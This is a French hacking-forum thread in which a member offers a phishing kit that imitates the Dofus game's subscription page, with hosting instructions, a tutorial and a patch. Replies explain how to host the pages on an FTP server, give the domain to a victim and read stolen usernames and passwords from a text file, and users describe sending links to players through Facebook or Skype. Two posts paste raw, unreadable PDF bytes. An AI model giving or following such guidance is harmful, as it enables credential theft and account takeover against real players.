Dofus Abonnement Phishing

    Publicités

Users Who Are Viewing This Thread (Total: 0, Members: 0, Guests: 0)

balbosseze

Membre
Nov 17, 2011
30
0
311
Paris
Bonjour à tous ! Eh bien voilà j'avais pas grand chose à faire donc j'ai "codé" un petit phishing abonnement dofus un peu à l'arrache :non:.

Il reste quand même crédible.

Quelques Screens :

90686311.jpg


74440114.jpg


70785933.jpg


captureand.jpg


endkpk.jpg


Instructions :

Téléchargez le pack et hébergez le sur votre ftp.

C'est tout !!

Téléchargement : Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris!

Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris!

Et le patch AlexLaSram : Télécharger

Et en prime un petit tuto (pdf) tant attendu ! : Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris!

Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris!

Il me semble qu'on m'avait aussi demandé un Virus Scan.

Virus Scan : Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris!

Info : Pour changer le bg, rendez vous Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris!, téléchargez l'image puis remplacez "steamers_july.jpg".
 

Razorkg

Membre
Aug 5, 2012
7
0
421
Joli! .... Dommage pour la/les faute(s) d'orthographe ...

ça donne tout de suite moins de crédibilité mais pratiquement personne n'y porte attention avec l'habitude
 

balbosseze

Membre
Nov 17, 2011
30
0
311
Paris
Ah mince désolé je vais corriger ça tout de suite ! Oui je l'avais fait un peu à l'arrache...

Voilà c'est Corrigé ! Merci de me l'avoir fait remarquer.
 

Slowm

Nouveau membre
Aug 5, 2012
2
0
201
je my connait pas du tout jai 3 question:
quesqu'un html, un php et un ftp
merci de ta reponse
 

balbosseze

Membre
Nov 17, 2011
30
0
311
Paris
Un fichier html est une page web, comme celle que tu as sous les yeux. Tu peut en ouvrir une en local, c'est à dire que si tu ouvres un fichier html qui se trouve sur ton bureau, ton navigateur internet va t'afficher une page web. Jusque là rien de difficile.
En gros c'est ca : Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris!

Le php = html. Mais il ne peut pas être ouvert en local. (en gros)
Comme ca : Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris!

Le FTP est le "serveur" sur lequel tu vas stocker tes fichiers. Il te fournira un nom de domaine (ex: monsite.com). Il faudra te connecter à ce serveur à l'aide d'un logiciel FTP (ex : FileZilla) et y mettre mon "pack". (tous les fichiers). Ensuite tu donnes le nom de domaine (monsite.com par ex) à un pigeon et une fois qu'il aura rentré ses identifiants sur FileZilla tu verras un fichier nommé "usernames.txt" avec son ID et MDP.

Ca peut paraître un peu compliqué surtout vu comment j'explique...
 

balbosseze

Membre
Nov 17, 2011
30
0
311
Paris
Bonjour à tous. J'ai une mauvaise nouvelle...

Malheureusement les serveurs d'ankama ont été mis à jour et ont fourbement changé les adresses correspondant à mos site...
Il est donc temporairement inactif mais ne vous inquiétez pas, je trouverais la solution et le remettrait sur pieds.

Désolé.
 

sliaras999

Membre
Jan 15, 2012
14
0
301
28
je recherche une réponse rapide, tout marche bien juske la mais les comtpe sont dans kel fichié ?
 

alexlasram

Membre
Jul 10, 2011
73
0
426
30
OMG je t'aime sa fait maintenant presque 2 ans depuis la dispartition de wa-forex (pour se qui connaissent) que je n'est plus fait cette technique.
:) :) :) :) :) :) :) :) :)
 

alexlasram

Membre
Jul 10, 2011
73
0
426
30
Fiou apres 3 heure de problème sa marche enfin!!!!
Un gros gros gros merci a toi je te met un j'aime
 

Razorkg

Membre
Aug 5, 2012
7
0
421
de nouveau, merci, et nickel la correction! ...

Cependant, un seul truc ... c est sans aucun intérêt si le compte est certifié on est d'accord? (enfin, accès au compte restreint)
 

alexlasram

Membre
Jul 10, 2011
73
0
426
30
le seul truk enervant c'est que dofus ne laisse passer aucun lien pour leur envoyer le lien je doit les ajouter sur facebook ou skype et leur passer le lien
 

michken

Membre
Jun 14, 2010
38
0
566
27
%µµµµ
1 0 obj
<</Type/Catalog/Pages 2 0 R/Lang(fr-FR) /StructTreeRoot 61 0 R/MarkInfo<</Marked true>>>>
endobj
2 0 obj
<</Type/Pages/Count 11/Kids[ 3 0 R 15 0 R 19 0 R 23 0 R 28 0 R 34 0 R 39 0 R 43 0 R 47 0 R 51 0 R 55 0 R] >>
endobj
3 0 obj
<</Type/Page/Parent 2 0 R/Resources<</Font<</F1 5 0 R/F2 8 0 R>>/ExtGState<</GS7 7 0 R>>/XObject<</Image13 13 0 R/Image14 14 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/MediaBox[ 0 0 595.32 841.92] /Contents 4 0 R/Group<</Type/Group/S/Transparency/CS/DeviceRGB>>/Tabs/S/StructParents 0>>
endobj
4 0 obj
<</Filter/FlateDecode/Length 700>>
stream
xœTÛnÚ@ }Gâ¬æÑ®êÍìÕ¶„, C¢TŠÔªH}ˆúà Cœ HmˆÚüZ¿¨Ñ™5$¸ ñ²>sÎÌÙ ÃÙG
T'APELLE SA UN TUTO ?
 

balbosseze

Membre
Nov 17, 2011
30
0
311
Paris
lien mort :/

Euuh non le lien fonctionne...

---------- Message ajouté à 16h11 ---------- Le message précédent était à 16h08 ----------

%µµµµ
1 0 obj
<</Type/Catalog/Pages 2 0 R/Lang(fr-FR) /StructTreeRoot 61 0 R/MarkInfo<</Marked true>>>>
endobj
2 0 obj
<</Type/Pages/Count 11/Kids[ 3 0 R 15 0 R 19 0 R 23 0 R 28 0 R 34 0 R 39 0 R 43 0 R 47 0 R 51 0 R 55 0 R] >>
endobj
3 0 obj
<</Type/Page/Parent 2 0 R/Resources<</Font<</F1 5 0 R/F2 8 0 R>>/ExtGState<</GS7 7 0 R>>/XObject<</Image13 13 0 R/Image14 14 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/MediaBox[ 0 0 595.32 841.92] /Contents 4 0 R/Group<</Type/Group/S/Transparency/CS/DeviceRGB>>/Tabs/S/StructParents 0>>
endobj
4 0 obj
<</Filter/FlateDecode/Length 700>>
stream
xœTÛnÚ@ }Gâ¬æÑ®êÍìÕ¶„, C¢TŠÔªH}ˆúà Cœ HmˆÚüZ¿¨Ñ™5$¸ ñ²>sÎÌÙ ÃÙG
T'APELLE SA UN TUTO ?

Bah écoute l'ami si tu sais pas ouvrir un pdf je peut pas grand chose pour toi ^^
Ca s'ouvre pas avec le bloc note ^^

Télécharge Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris!

Et t'énerves pas comme ca ! Demande plutôt de l'aide.
Bon allé bonne chance à toi en tout cas.

---------- Message ajouté à 16h13 ---------- Le message précédent était à 16h11 ----------

le seul truk enervant c'est que dofus ne laisse passer aucun lien pour leur envoyer le lien je doit les ajouter sur facebook ou skype et leur passer le lien

Oui en effet c'est assez ennuyeux.

Tu avais dit 3 heures de problème ? que t'est-il arrivé ?

---------- Message ajouté à 16h15 ---------- Le message précédent était à 16h13 ----------

de nouveau, merci, et nickel la correction! ...

Cependant, un seul truc ... c est sans aucun intérêt si le compte est certifié on est d'accord? (enfin, accès au compte restreint)

Euuh... Quoi ? Nan désolé je comprends vraiment pas...:fou:
A vrai dire je sais pas ce que c'est un compte certifié :lol:
:jesors:
 

emr

Membre actif
Feb 26, 2011
415
0
922
34
je te jure lien mort :) regarde ce que sa dit :) :

ERROR: Login failed. Account not validated. (2b976ba6)

pour les deux liens
 

lepolodu24

Membre actif
Apr 2, 2010
156
1
743
28
J'ai eu le meme problème, mais cela vient de rapidshare, il faut que tu te connectes avec un compte.